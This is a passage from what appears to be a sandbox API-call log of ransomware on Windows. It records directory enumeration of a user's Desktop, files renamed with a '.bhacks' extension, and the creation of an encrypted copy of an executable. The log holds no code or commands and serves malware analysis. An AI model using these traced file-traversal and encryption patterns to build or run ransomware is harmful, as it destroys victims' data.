ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0066.982] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2559e9dc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2559e9dc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa120, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4.bhacks", cAlternateFileName="WLVIPV~1.BHA")) returned 1 [0066.982] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0066.982] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0066.982] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0066.982] FindClose (in: hFindFile=0x9be900 | out: hFindFile=0x9be900) returned 1 [0066.982] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.exe", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 0x9bf140 [0066.983] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.983] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0066.983] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be540 [0066.983] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.983] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0066.983] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0066.983] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0066.984] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0066.984] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0066.984] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0066.984] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0066.984] FindClose (in: hFindFile=0x9be540 | out: hFindFile=0x9be540) returned 1 [0066.984] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.exe", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0066.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x258271f7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bea80 [0066.985] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x248f4274, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x258271f7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.985] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0066.985] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2464586c, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2464586c, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2485b8b7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb4f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx.bhacks", cAlternateFileName="E2JRFW~1.BHA")) returned 1 [0066.985] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0066.985] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0066.986] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256a9b70, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x256a9b70, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x257b4b1f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xad40, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4.bhacks", cAlternateFileName="KZHWID~1.BHA")) returned 1 [0066.986] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0066.986] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0066.986] FindNextFileW (in: hFindFile=0x9bea80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0066.986] FindClose (in: hFindFile=0x9bea80 | out: hFindFile=0x9bea80) returned 1 [0066.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.exe", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0066.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf020 [0066.987] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.987] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0066.987] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0066.987] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0066.987] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0066.987] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0066.988] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0066.988] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0066.988] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0066.988] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0066.988] FindClose (in: hFindFile=0x9bf020 | out: hFindFile=0x9bf020) returned 1 [0066.988] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.exe", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0066.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0066.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0066.988] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks", lpFilePart=0x0) returned 0x48 [0066.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0066.989] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0066.989] GetFileType (hFile=0x324) returned 0x1 [0066.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.989] GetFileType (hFile=0x324) returned 0x1 [0067.102] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0067.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0067.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0067.102] GetFileType (hFile=0x33c) returned 0x1 [0067.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 